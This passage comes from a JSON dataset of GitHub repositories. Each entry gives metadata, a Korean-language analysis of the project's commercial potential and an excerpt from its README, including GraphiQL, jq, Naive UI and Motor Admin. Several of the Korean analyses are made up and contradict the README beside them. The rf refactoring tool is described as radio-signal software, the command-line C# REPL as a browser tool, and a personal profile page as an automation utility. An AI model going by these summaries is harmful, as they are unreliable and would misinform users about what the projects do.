processing. These models are then used in an EpoxyController to declare what items to show in the RecyclerView.\n\nThis abstracts the boilerplate of view holders, diffing items and binding payload changes, item types, item ids, span counts, and more, in order to simplify building screens with multiple view types. Additionall","composite_score":0.0766,"license_safety_tag":"safe"},{"name":"vanhiupun/vanhiupun","github_url":"https://github.com/vanhiupun/vanhiupun","stars":16,"language":"","license":"unknown","abandonment_months":4,"description":"# vanhiupun/vanhiupun 저장소 분석\n\n## 왜 보물인가\n저장소 설명이 없어 구체적인 가치를 판단하기 어렵지만, 16개의 스타와 최근 활발한 커밋 기록으로 보아 누군가는 필요로 하는 작은 규모의 유용한 도구로 보입니다.\n\n## 어디에 쓸 수 있나\n1. **개인용 작업 자동화 도구**: 반복되는 일상 업무를 자동으로 처리하는 SaaS 서비스로 ","readme_excerpt":"### Hi there, I'm Theo 👋\n\n**Languages:**\n\n![HTML5](https://img.shields.io/badge/HTML5-E34F26?logo=HTML5&logoColor=fff)\n![CSS3](https://img.shields.io/badge/CSS3-1572B6?logo=CSS3&logoColor=fff)\n![JavaScript](https://img.shields.io/badge/JavaScript-F7DF1E?logo=JavaScript&logoColor=333)\n![TypeScript](https://img.shields.io/badge/TypeScript-3178C6?logo=TypeScript&logoColor=fff)\n\n**Frameworks and Tools:**\n\n![React](https://img.shields.io/badge/React-61DAFB?logo=React&logoColor=333)\n![Next.js](https://img.shields.io/badge/Next.js-000000?logo=Next.js&logoColor=fff)\n![Vue.js](https://img.shields.io/badge/Vue.js-4FC08D?logo=Vue.js&logoColor=fff)\n![Sass](https://img.shields.io/badge/Sass-CC6699?logo=Sass&logoColor=fff)\n![Tailwind CSS](https://img.shields.io/badge/Tailwind%20CSS-06B6D4?logo=TailwindCSS&logoColor=fff)\n![Git](https://img.shields.io/badge/Git-F05032?logo=Git&logoColor=fff)\n![Visual Studio Code](https://img.shields.io/badge/VS%20CODE-007ACC?logo=VisualStudioCode&logoColor=fff)\n\n**Abo","composite_score":0.0765,"license_safety_tag":"unknown"},{"name":"omohokcoj/motor-admin","github_url":"https://github.com/omohokcoj/motor-admin","stars":44,"language":"Ruby","license":"MIT","abandonment_months":4,"description":"# Motor Admin 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 데이터베이스를 관리하고 비즈니스 기능을 자동으로 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n스타트업이 신규 서비스를 빠르게 론칭할 때 관리 대시보드를 자동 생성해주므로 개발 기간과 비용을 대폭 줄일 수 있습니다.\n\n**2. 내부 업무 도구**\n중소기업","readme_excerpt":"<div align=\"center\">\n\n[![Motor Admin Rails](https://user-images.githubusercontent.com/5418788/140520844-a947845d-b579-4b3f-9b49-c539ad3cf580.png)](https://www.getmotoradmin.com/ruby-on-rails)\n\n# Motor Admin Rails\n\nLow-code Admin panel and Business intelligence Rails engine **(no DSL - configurable from the UI)**.\n\n🤓 [Demo App](https://app.getmotoradmin.com/demo/) | 👀 [Features overview](https://www.youtube.com/watch?v=ngVoci8Hll4&list=PLu7llEMh0KcOkR3Uy_RJT0cXPZQKAYVsq&index=1) | ⭐ [Pro](https://www.getmotoradmin.com/ruby-on-rails)\n</div>\n\n[![Admin Panel](https://user-images.githubusercontent.com/5418788/119318538-1f30e300-bc82-11eb-94a4-107c31c93b13.png)](https://app.getmotoradmin.com/demo/)\n\n## Installation\nAdd this line to your application's Gemfile:\n\n```ruby\ngem 'motor-admin'\n```\n\nAnd then execute:\n```bash\n$ bundle install\n```\n\nCreate and run migration:\n```bash\n$ rails motor:install && rake db:migrate\n```\n\n## Features\n\n* [Customizable CRUD](#customizable-crud)\n* [Custom actions](#c","composite_score":0.0764,"license_safety_tag":"safe"},{"name":"TuSimple/naive-ui","github_url":"https://github.com/TuSimple/naive-ui","stars":18,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Naive UI 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 아름다운 디자인 요소들(버튼, 메뉴, 입력창 등)을 미리 만들어둔 도구 모음으로, 개발자의 작업 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 CRM, 프로젝트 관리 도구 등을 빠르게 개발할 때 기본 UI 요소로 활용\n2","readme_excerpt":"<p align=\"center\">\n  <img width=\"144px\" src=\"https://naiveui.oss-cn-hongkong.aliyuncs.com/naivelogo.svg\" />\n</p>\n\n<h1 align=\"center\">Naive UI</h1>\n<p align=\"center\">A Vue 3 Component Library</p>\n<p align=\"center\"><b>Fairly Complete, Theme Customizable, Uses TypeScript, Fast</b></p>\n<p align=\"center\">Kinda Interesting</p>\n\n<p align=\"center\">\n  <a href=\"https://npmjs.com/package/naive-ui\">\n    <img src=\"https://img.shields.io/npm/v/naive-ui.svg\" alt=\"npm\">\n  </a>\n  <a href=\"https://pkg.pr.new/~/tusen-ai/naive-ui\">\n    <img src=\"https://pkg.pr.new/badge/tusen-ai/naive-ui\" alt=\"pkg.pr.new\">\n  </a>\n</p>\n\n<p align=\"center\">English | <a href=\"README.zh-CN.md\">中文</a></p>\n\n## Documentation\n\n[www.naiveui.com](http://www.naiveui.com)\n\n## Community\n\n- [Discord](https://discord.gg/Pqv7Mev5Dd)\n- DingTalk Group 1 (Member limit reached) 33482509\n- DingTalk Group 2 (Member limit reached) 35886835\n- DingTalk Group 3 (Member limit reached) 32377370\n- DingTalk Group 4 (Member limit reached) 8165002788\n- D","composite_score":0.0762,"license_safety_tag":"safe"},{"name":"waf/CSharpRepl","github_url":"https://github.com/waf/CSharpRepl","stars":22,"language":"C#","license":"MPL-2.0","abandonment_months":4,"description":"# CSharpRepl 저장소 분석\n\n## 왜 보물인가\n프로그래밍 언어인 C#을 웹 브라우저에서 즉시 실행해볼 수 있는 도구로, 개발자들이 코드를 테스트하고 학습하는 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: C# 프로그래밍 강좌에서 학생들이 바로 코드를 작성하고 결과를 확인하는 학습 환경 제공\n2.","readme_excerpt":"# C# REPL <a href=\"https://www.nuget.org/packages/CSharpRepl\" align=\"right\"><img alt=\"NuGet Version\" src=\"https://img.shields.io/nuget/v/CSharpRepl?color=004880&style=for-the-badge\" align=\"right\" /></a>\n\nA cross-platform command line <a href=\"https://en.wikipedia.org/wiki/Read%E2%80%93eval%E2%80%93print_loop\" target=\"_blank\"><abbr title=\"Read Eval Print Loop\">REPL</abbr></a> for the rapid experimentation and exploration of C#. It supports intellisense, installing NuGet packages, and referencing local .NET projects and assemblies.\n\n<div align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/waf/CSharpRepl/main/.github/readme_assets/csharprepl.gif\" alt=\"C# REPL Animated GIF\" style=\"max-width:80%;\">\n  <p align=\"center\"><i>(click to view animation)</i></p>\n</div>\n\nC# REPL provides the following features:\n\n- Syntax highlighting via ANSI escape sequences\n- Intellisense with documentation and overload navigation\n- Automatic formatting of typed input\n- Nuget package installation\n- Refer","composite_score":0.076,"license_safety_tag":"unknown"},{"name":"FirmaChain/firmachain","github_url":"https://github.com/FirmaChain/firmachain","stars":13,"language":"Go","license":"NOASSERTION","abandonment_months":4,"description":"# FirmaChain 저장소 분석\n\n## 왜 보물인가\n블록체인 기술을 활용해 전자 서명이나 계약의 진위를 확인할 수 있는 신뢰할 수 있는 시스템을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **계약 검증 SaaS**: 기업들이 중요한 계약서의 서명 진위를 온라인으로 확인하는 구독형 서비스\n2. **부동산 거래 플랫폼**: 집 매매 시 필요한 여러 서류의","readme_excerpt":"# FirmaChain\n\n[![GitHub tag (latest SemVer)](https://img.shields.io/github/v/tag/firmachain/firmachain)](https://github.com/firmachain/firmachain/releases)\n[![license](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/firmachain/firmachain/blob/master/LICENSE)\n[![Go Reference](https://pkg.go.dev/badge/github.com/firmachain/firmachain/.svg)](https://pkg.go.dev/github.com/firmachain/firmachain/)\n[![report](https://goreportcard.com/badge/github.com/firmachain/firmachain)](https://goreportcard.com/report/github.com/firmachain/firmachain)\n![Lines of code](https://img.shields.io/tokei/lines/github/firmachain/firmachain)\n\n![ci](https://github.com/firmachain/firmachain/actions/workflows/test.yml/badge.svg)\n<a href=\"https://codecov.io/gh/firmachain/firmachain\">\n    <img src=\"https://codecov.io/gh/firmachain/firmachain/branch/master/graph/badge.svg\">\n</a>\n\n\n## A BLOCKCHAIN BASED E-CONTRACT PLATFORM\n\nFirmaChain adds a signing and verifying e-contract function to the ","composite_score":0.0759,"license_safety_tag":"unknown"},{"name":"indexzero/http-server","github_url":"https://github.com/indexzero/http-server","stars":5,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# http-server 프로젝트 분석\n\n## 왜 보물인가\n누구나 간단한 명령어로 자신의 컴퓨터를 웹서버로 변환할 수 있어, 개발자들의 빠른 테스트와 파일 공유를 가능하게 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 개발자용 빠른 프로토타이핑 플랫폼 (로컬 테스트 환경을 클라우드에서 제공)\n2. **내부 업무 도구**: 소규모 팀의","readme_excerpt":"[![GitHub Workflow Status (master)](https://img.shields.io/github/actions/workflow/status/http-party/http-server/node.js.yml?style=flat-square&branch=master)](https://github.com/http-party/http-server/actions)\n[![npm](https://img.shields.io/npm/v/http-server.svg?style=flat-square)](https://www.npmjs.com/package/http-server) [![homebrew](https://img.shields.io/homebrew/v/http-server?style=flat-square)](https://formulae.brew.sh/formula/http-server) [![npm downloads](https://img.shields.io/npm/dm/http-server?color=blue&label=npm%20downloads&style=flat-square)](https://www.npmjs.com/package/http-server)\n[![license](https://img.shields.io/github/license/http-party/http-server.svg?style=flat-square)](https://github.com/http-party/http-server/blob/master/LICENSE)\n\n# http-server: a simple static HTTP server\n\n`http-server` is a simple, zero-configuration command-line static HTTP server.  It is powerful enough for production usage, but it's simple and hackable enough to be used for testing, loca","composite_score":0.0759,"license_safety_tag":"safe"},{"name":"DefiLlama/dimension-adapters","github_url":"https://github.com/DefiLlama/dimension-adapters","stars":187,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0759,"license_safety_tag":"unknown"},{"name":"udacity/nd064_course_1","github_url":"https://github.com/udacity/nd064_course_1","stars":248,"language":"Python","license":"NOASSERTION","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.0759,"license_safety_tag":"unknown"},{"name":"TommyLemon/Android-ZBLibrary","github_url":"https://github.com/TommyLemon/Android-ZBLibrary","stars":10,"language":"Java","license":"apache-2.0","abandonment_months":2,"description":"# Android-ZBLibrary 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 반복적으로 작성해야 하는 기본 기능들을 미리 만들어둔 도구 상자로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 안드로이드 앱 개발 대행사가 프로젝트마다 이 라이브러리를 기본으로 포함시키는 개발 템플릿 판매\n2.","readme_excerpt":"# ZBLibrary-Android快速开发框架 \n[<img src=\"https://devin.ai/assets/deepwiki-badge.png\" alt=\"Ask DeepWiki.com\" height=\"12px\" style=\"height: 20px\" />](https://deepwiki.com/TommyLemon/Android-ZBLibrary)\n[![](https://jitpack.io/v/TommyLemon/Android-ZBLibrary.svg)](https://jitpack.io/#TommyLemon/Android-ZBLibrary)\n[![Android](https://img.shields.io/badge/Android-4.0.3%2B-brightgreen.svg?style=flat)](https://developer.android.com/guide/topics/manifest/uses-sdk-element.html#ApiLevels)\n[![Gradle Version](https://img.shields.io/badge/gradle-2.10%2B-green.svg)](https://docs.gradle.org/current/release-notes)\n[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html) \n[<img src=\"https://whitehub.net/cystack/img/logo.c0ea980.svg\" alt=\"WhiteHub.net\" height=\"12\" style=\"height: 20px\" />](https://whitehub.net/programs/zblibrary)\n\nMVP 架构，提供一套开发标准（View, Data, Event）以及模板和工具类并规范代码。封装层级少，简单高效兼容性好。\n\nOKHttp 网络请求、Glide 图片加载、ZXing 二维码、沉浸状态栏、下载安装、自动缓存以及各","composite_score":0.0757,"license_safety_tag":"safe"},{"name":"bootdotdev/learn-cicd-typescript-starter","github_url":"https://github.com/bootdotdev/learn-cicd-typescript-starter","stars":13,"language":"TypeScript","license":"NOASSERTION","abandonment_months":3,"description":"","readme_excerpt":"","composite_score":0.0755,"license_safety_tag":"unknown"},{"name":"rsc/rf","github_url":"https://github.com/rsc/rf","stars":8,"language":"Go","license":"BSD-3-Clause","abandonment_months":4,"description":"# rsc/rf 저장소 분석\n\n## 왜 보물인가\n무선 통신 신호를 분석하고 처리하는 기술로, 통신 인프라나 보안 감시 분야에서 핵심 역할을 할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **무선 신호 모니터링 SaaS**: 통신사나 보안업체가 주파수 간섭 감지 및 불법 신호 탐지 서비스 제공\n2. **통신 품질 분석 API**: 네트워크 인프라 ","readme_excerpt":"rf is an experimental refactoring tool. It is very much a work in progress.\n\n**rf is incredibly rough and likely to be buggy and change incompatibly.**\n","composite_score":0.0752,"license_safety_tag":"safe"},{"name":"PharkMillups/beautiful-docs","github_url":"https://github.com/PharkMillups/beautiful-docs","stars":11,"language":"","license":"MIT","abandonment_months":3,"description":"# PharkMillups/beautiful-docs 분석\n\n## 왜 보물인가\n복잡한 기술 문서를 누구나 쉽게 이해할 수 있는 깔끔한 형태로 자동으로 변환해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 지원팀이 API 사용 설명서를 자동으로 보기 좋게 정리해서 고객에게 제공\n- **내부 업무 도구**: 대기업의 IT부서가 직","readme_excerpt":"# Beautiful Docs\n\nI love documentation. If you work with/are writing code intended for usage and consumption by more than one person, you should love it, too. Documentation and other resources will make or break the success of your project. And the more open and collaborative you want development to be, the more crucial docs become.\n\nWith that in mind, here's a list of docs and other developer resources that myself and others find particularly useful, well-written, and otherwise \"beautiful.\" May they serve to inspire you when writing and designing yours. Thanks to various contributors, we now also have sections dedicated to [Writing about Documentation](#writing-about-docs) and [Tools for Generating Docs](#generating-docs).\n\nThis should be updated fairly regularly. As usual, **pull requests are encouraged**. \n* If you're contributing a link, be sure to include a few words on why you're adding it and some sort of self-attribution so that people can know from whom it came.\n* All docs are","composite_score":0.0751,"license_safety_tag":"safe"},{"name":"stedolan/jq","github_url":"https://github.com/stedolan/jq","stars":7,"language":"C","license":"NOASSERTION","abandonment_months":0,"description":"# jq 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 간단하게 정렬하고 필터링해주는 \"데이터 정리 도구\"로, 프로그래머가 매일 사용하는 필수 유틸리티입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 처리 플랫폼에 내장하여 고객이 자신의 파일을 쉽게 정렬할 수 있도록 하는 기능\n- **내부 업무 도구**: 회사의 방대한 고객 정보나 ","readme_excerpt":"# jq\n\n`jq` is a lightweight and flexible command-line JSON processor akin to `sed`,`awk`,`grep`, and friends for JSON data. It's written in portable C and has zero runtime dependencies, allowing you to easily slice, filter, map, and transform structured data.\n\n## Documentation\n\n- **Official Documentation**: [jqlang.org](https://jqlang.org)\n- **Try jq Online**: [play.jqlang.org](https://play.jqlang.org)\n\n## Installation\n\n### Prebuilt Binaries\n\nDownload the latest releases from the [GitHub release page](https://github.com/jqlang/jq/releases).\n\n### Docker Image\n\nPull the [jq image](https://github.com/jqlang/jq/pkgs/container/jq) to start quickly with Docker.\n\n#### Run with Docker\n\n##### Example: Extracting the version from a `package.json` file\n\n```bash\ndocker run --rm -i ghcr.io/jqlang/jq:latest < package.json '.version'\n```\n\n##### Example: Extracting the version from a `package.json` file with a mounted volume\n\n```bash\ndocker run --rm -i -v \"$PWD:$PWD\" -w \"$PWD\" ghcr.io/jqlang/jq:latest","composite_score":0.075,"license_safety_tag":"unknown"},{"name":"turicas/socios-brasil","github_url":"https://github.com/turicas/socios-brasil","stars":6,"language":"Python","license":"LGPL-3.0","abandonment_months":4,"description":"# turicas/socios-brasil 분석\n\n## 왜 보물인가\n브라질의 모든 기업 정보를 한 곳에서 찾을 수 있는 데이터베이스로, 기업 신용 조회나 거래처 검증이 필요한 누구나 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 브라질 수출입업체를 위한 거래처 신용 검증 웹 서비스 (월 구독형)\n- **내부 업무 도구**: 한","readme_excerpt":"# Sócios de Empresas Brasileiras\n\nScript que baixa todos os dados de sócios das empresas brasileiras [disponíveis\nno site da Receita\nFederal](https://receita.economia.gov.br/orientacao/tributaria/cadastros/cadastro-nacional-de-pessoas-juridicas-cnpj/dados-publicos-cnpj),\nextrai, limpa e converte para CSV. Para entender melhor sobre quais dados estão\ndisponíveis, consulte a [história desse dataset](historia-do-dataset.md).\n\n\n## Licença\n\nA licença do código é [LGPL3](https://www.gnu.org/licenses/lgpl-3.0.en.html) e\ndos dados convertidos [Creative Commons Attribution\nShareAlike](https://creativecommons.org/licenses/by-sa/4.0/). Caso utilize os\ndados, **cite a fonte original e quem tratou os dados**, como: **Fonte: Receita\nFederal do Brasil, dados tratados por Álvaro\nJusten/[Brasil.IO](https://brasil.io/)**. Caso compartilhe os dados, **utilize\na mesma licença**.\n\n\n## Dados\n\n### Entrada\n\nOs dados publicados pela Receita Federal do Brasil contemplam as seguintes\ntabelas:\n\n- Cadastro das emp","composite_score":0.0747,"license_safety_tag":"restricted"},{"name":"facebook/immutable-js","github_url":"https://github.com/facebook/immutable-js","stars":10,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Facebook Immutable-js 상용화 분석\n\n## 왜 보물인가\nFacebook이 만든 이 도구는 웹 애플리케이션에서 데이터를 더 안전하고 빠르게 관리하도록 도와주는 기본 기술로, 많은 회사들이 필요로 하는 필수 부품입니다.\n\n## 어디에 쓸 수 있나\n1. **협업 도구 SaaS**: 실시간으로 여러 사용자가 같은 문서를 수정할 때 데이터 충돌을","readme_excerpt":"# Immutable collections for JavaScript\n\n[![Build Status](https://github.com/immutable-js/immutable-js/actions/workflows/ci.yml/badge.svg?branch=main)](https://github.com/immutable-js/immutable-js/actions/workflows/ci.yml?query=branch%3Amain) [Chat on slack](https://immutable-js.slack.com)\n\n[Read the docs](https://immutable-js.com/docs/) and eat your vegetables.\n\nDocs are automatically generated from [README.md][] and [immutable.d.ts][].\nPlease contribute! Also, don't miss the [wiki][] which contains articles on\nadditional specific topics. Can't find something? Open an [issue][].\n\n**Table of contents:**\n\n- [Introduction](#introduction)\n- [Getting started](#getting-started)\n- [The case for Immutability](#the-case-for-immutability)\n- [JavaScript-first API](#javascript-first-api)\n- [Nested Structures](#nested-structures)\n- [Equality treats Collections as Values](#equality-treats-collections-as-values)\n- [Batching Mutations](#batching-mutations)\n- [Lazy Seq](#lazy-seq)\n- [Additional Tools a","composite_score":0.0744,"license_safety_tag":"safe"},{"name":"adamwdraper/Numeral-js","github_url":"https://github.com/adamwdraper/Numeral-js","stars":7,"language":"JavaScript","license":"mit","abandonment_months":3,"description":"# Numeral-js 보물 분석\n\n## 왜 보물인가\n숫자를 읽기 좋게 표시하는 기술로, 금융·통계 서비스에서 필수적인 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 회계 관리 웹사이트**\n- 매출, 지출, 수익을 \"₩1,234,567\" 같이 보기 좋게 표시하는 기능 제공\n\n**2. 내부 업무 도구: 대시보드 시스템**\n- 회사","readme_excerpt":"# [Numeral.js](http://numeraljs.com/)\n\nA javascript library for formatting and manipulating numbers.\n\n[Website and documentation](http://numeraljs.com/)\n\n\n# Travis Build Status\n\nMaster [![Build Status](https://api.travis-ci.org/adamwdraper/Numeral-js.svg)](https://travis-ci.org/adamwdraper/Numeral-js)\n\nDevelop [![Build Status](https://travis-ci.org/adamwdraper/Numeral-js.svg?branch=develop)](https://travis-ci.org/adamwdraper/Numeral-js)\n\n# NPM\n\n[![NPM](https://nodei.co/npm/numeral.svg?downloads=true)](https://nodei.co/npm/numeral/)\n\n#CDNJS\n\n[![CDNJS](https://img.shields.io/cdnjs/v/numeral.js.svg)](https://cdnjs.com/libraries/numeral.js)\n\n# Contributing\n\n#### Important: Please create your branch from and submit pull requests to the `develop` branch.  All pull requests must include the appropriate tests.\n\n1. Fork the library\n\n2. [Install grunt](http://gruntjs.com/getting-started#installing-the-cli)\n\n3. Run `npm install` to install dependencies\n\n4. Create a new branch from `develop`\n\n5. A","composite_score":0.0743,"license_safety_tag":"safe"},{"name":"spatie/regex","github_url":"https://github.com/spatie/regex","stars":9,"language":"PHP","license":"MIT","abandonment_months":4,"description":"# spatie/regex 분석 보고서\n\n## 왜 보물인가\n텍스트에서 원하는 패턴을 찾아주는 정규식 도구를 쉽게 만들 수 있는 기초 라이브러리로, 복잡한 검색 기능이 필요한 모든 웹 서비스의 핵심 엔진이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **이메일 검증 SaaS**: 이메일 주소가 정말 맞는지 자동으로 확인해주는 구독 서비스\n2. **콘텐츠","readme_excerpt":"# Making regex great again\n\n[![Latest Version on Packagist](https://img.shields.io/packagist/v/spatie/regex.svg?style=flat-square)](https://packagist.org/packages/spatie/regex)\n![Tests](https://github.com/spatie/regex/workflows/Tests/badge.svg)\n[![Software License](https://img.shields.io/badge/license-MIT-brightgreen.svg?style=flat-square)](LICENSE.md)\n[![Total Downloads](https://img.shields.io/packagist/dt/spatie/regex.svg?style=flat-square)](https://packagist.org/packages/spatie/regex)\n\nPhp's built in `preg_*` functions require some odd patterns like passing variables by reference and treating `false` or `null` values as errors. `spatie/regex` provides a cleaner interface for `preg_match`, `preg_match_all`, `preg_replace` and `preg_replace_callback`.\n\n```php\nuse Spatie\\Regex\\Regex;\n\n// Using `match`\nRegex::match('/a/', 'abc'); // `MatchResult` object\nRegex::match('/a/', 'abc')->hasMatch(); // true\nRegex::match('/a/', 'abc')->result(); // 'a'\n\n// Capturing groups with `match`\nRegex::m","composite_score":0.0741,"license_safety_tag":"safe"},{"name":"fosskers/aura","github_url":"https://github.com/fosskers/aura","stars":33,"language":"Haskell","license":"GPL-3.0","abandonment_months":4,"description":"# Aura 저장소 분석\n\n## 왜 보물인가\n리눅스 시스템에서 소프트웨어를 자동으로 설치하고 관리해주는 도구로, 복잡한 설정을 단순화시켜주는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 리눅스 서버 관리 플랫폼으로, 고객들이 손쉽게 소프트웨어를 배포하고 업데이트할 수 있는 웹 대시보드 제공\n- **내부 업무 ","readme_excerpt":"<div align=\"center\">\n  <img src=\"/logo/medium-150x150.png\">\n\n# The Aura Package Manager\n\n[![img](https://img.shields.io/hackage/v/aura.svg)](http://hackage.haskell.org/package/aura)\n[![Crates.io Version](https://img.shields.io/crates/v/aura-pm)](https://crates.io/crates/aura-pm)\n![img](https://img.shields.io/github/downloads/fosskers/aura/total.svg)\n[![Uptime Robot ratio (30 days)](https://img.shields.io/uptimerobot/ratio/m797414036-bda0448875649477b8f9cea7?label=Faur%20Uptime)](https://stats.uptimerobot.com/xacx44XVJx/797414036)\n\n  <div>\n    :uk:\n    :jp:\n    :croatia:\n    :sweden:\n    :de:\n    :es:\n    :portugal:\n    :fr:\n    :ru:\n    :it:\n    :serbia:\n    :norway:\n    :indonesia:\n    :cn:\n    :netherlands:\n    :tr:\n    :saudi_arabia:\n    :ukraine:\n    :romania:\n    :vietnam:\n    :czech_republic:\n    :kr:\n    :india:\n    :bangladesh:\n    🇲🇪\n  </div>\n  <br>\n  \n</div>\n\nWelcome to the main repository for Aura, a multilingual package manager for Arch Linux.\n\nLooking for help? Try:\n\n- [Th","composite_score":0.074,"license_safety_tag":"restricted"},{"name":"binance-chain/bsc","github_url":"https://github.com/binance-chain/bsc","stars":12,"language":"Go","license":"LGPL-3.0","abandonment_months":0,"description":"# BSC(바이낸스 스마트 체인) 저장소 분석\n\n## 왜 보물인가\n블록체인 기반의 금융 거래를 가능하게 하는 핵심 인프라로, 암호화폐 거래소나 금융 서비스를 만드는 기업들이 반드시 필요로 하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래 플랫폼 SaaS**: 중소 거래소가 자체 플랫폼 구축 비용을 줄이기 위해 이 기술을 기반으로 한 거래 ","readme_excerpt":"## BNB Smart Chain\n\nThe goal of BNB Smart Chain is to bring programmability and interoperability to BNB Beacon Chain. In order to embrace the existing popular community and advanced technology, it will bring huge benefits by staying compatible with all the existing smart contracts on Ethereum and Ethereum tooling. And to achieve that, the easiest solution is to develop based on go-ethereum fork, as we respect the great work of Ethereum very much.\n\nBNB Smart Chain starts its development based on go-ethereum fork. So you may see many toolings, binaries and also docs are based on Ethereum ones, such as the name \"geth\".\n\n[![API Reference](\nhttps://pkg.go.dev/badge/github.com/ethereum/go-ethereum\n)](https://pkg.go.dev/github.com/ethereum/go-ethereum?tab=doc)\n[![Build Test](https://github.com/bnb-chain/bsc/actions/workflows/build-test.yml/badge.svg)](https://github.com/bnb-chain/bsc/actions)\n[![Discord](https://img.shields.io/badge/discord-join%20chat-blue.svg)](https://discord.gg/z2VpC455eU","composite_score":0.0738,"license_safety_tag":"restricted"},{"name":"graphql/graphiql","github_url":"https://github.com/graphql/graphiql","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# GraphQL/GraphiQL 프로젝트 분석\n\n## 왜 보물인가\n복잡한 데이터 요청을 사용자 친화적인 인터페이스로 간단하게 만들어주는 핵심 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: API 기반 소프트웨어 플랫폼에서 고객이 쉽게 데이터를 조회하고 관리할 수 있는 대시보드 제공\n2. **내부 업무 도구**: 기업의 데이터베","readme_excerpt":"<!-- @format -->\n\n# GraphQL IDE Monorepo\n\n> **Security Notice:** All versions of `graphiql` < `1.4.7` are vulnerable to an\n> XSS attack in cases where the GraphQL server to which the GraphiQL web app\n> connects is not trusted. Learn more\n> [in the graphiql `security` docs directory](docs/security)\n\n> **Looking for the [GraphiQL Docs?](packages/graphiql/README.md)**: This is the\n> root of the monorepo! The full GraphiQL docs are located at\n> [`packages/graphiql`](packages/graphiql)\n\n[![Build Status](https://github.com/graphql/graphiql/workflows/Node.JS%20CI/badge.svg)](https://github.com/graphql/graphiql/actions?query=workflow%3A%22Node.JS+CI%22)\n[![Discord](https://img.shields.io/discord/625400653321076807.svg)](https://discord.gg/NP5vbPeUFp)\n[![Code Coverage](https://img.shields.io/codecov/c/github/graphql/graphiql)](https://codecov.io/gh/graphql/graphiql)\n![GitHub top language](https://img.shields.io/github/languages/top/graphql/graphiql)\n![GitHub language count](https://img.shields.","composite_score":0.0734,"license_safety_tag":"safe"},{"name":"mre/idiomatic-rust","github_url":"https://github.com/mre/idiomatic-rust","stars":6,"language":"Rust","license":"unknown","abandonment_months":3,"description":"# mre/idiomatic-rust 분석\n\n## 왜 보물인가\n프로그래밍 언어 중 가장 안전하고 빠른 러스트를 올바르게 배우고 가르칠 수 있는 교육 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **프로그래밍 교육 플랫폼**: 온라인 코딩 학원이나 부트캠프에서 러스트 강좌 콘텐츠로 판매\n2. **기업 직무교육 도구**: IT 회사들이 신입 개발자 교육에","readme_excerpt":"<!--\n⚠️⚠️ WARNING: This file is generated by `make render`. Do not edit manually!\nSee `CONTRIBUTING.md` for more information.\n-->\n\n<picture >\n  <source media=\"(prefers-color-scheme: dark)\" srcset=\"assets/idiomatic-rust-dark.png\">\n  <img src=\"assets/idiomatic-rust.png\" />\n</picture>\n\n[![Check Links](https://github.com/mre/idiomatic-rust/workflows/Check%20Links/badge.svg)](https://github.com/mre/idiomatic-rust/actions/workflows/check_links.yml)\n\nThis repository collects resources for writing clean, idiomatic Rust code.\nYou can find a sortable/searchable version of this list [here](https://corrode.dev/idiomatic-rust/).\n\n> _Idiomatic_ coding means following the conventions of a given language. It is\n> the most concise, convenient, and common way of accomplishing a task in that\n> language, rather than forcing it to work in a way the author is familiar with\n> from a different language. - Adapted from [Tim\n> Mansfield](https://github.com/tim-hr/stuff/wiki/Idiomatic-coding)\n\nContributions welc","composite_score":0.0733,"license_safety_tag":"unknown"},{"name":"dortania/OpenCore-Install-Guide","github_url":"https://github.com/dortania/OpenCore-Install-Guide","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":2,"description":"# OpenCore-Install-Guide 상용화 분석\n\n## 왜 보물인가\n맥(Mac) 컴퓨터를 자신이 원하는 방식으로 설치하고 커스터마이징하는 방법을 단계별로 가르쳐주는 실용적인 가이드로, 기술 진입장벽을 낮춰줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 맥 초보자 대상 온라인 설치 컨설팅 플랫폼 (영상 강의 + 실시간 Q&A)\n2.","readme_excerpt":"---\nhome: true\nheroImage: /dortania-logo-clear.png\nheroText: Dortania's OpenCore Install Guide\nactionText: Getting Started→\nactionLink: prerequisites.md\n\nmeta:\n- name: description\n  content: Current supported version 1.0.6\n---\n\n# What is OpenCore and who is this guide for\n\nOpenCore is what we refer to as a \"boot loader\" – it is a complex piece of software that we use to prepare our systems for macOS – specifically by injecting new data for macOS such as SMBIOS, ACPI tables and kexts. How this tool differs from others like Clover is that it has been designed with security and quality in mind, allowing us to use many security features found on real Macs, such as [System Integrity Protection](https://support.apple.com/en-ca/HT204899) and [FileVault](https://support.apple.com/en-ca/HT204837). A more in-depth look can be found here: [Why OpenCore over 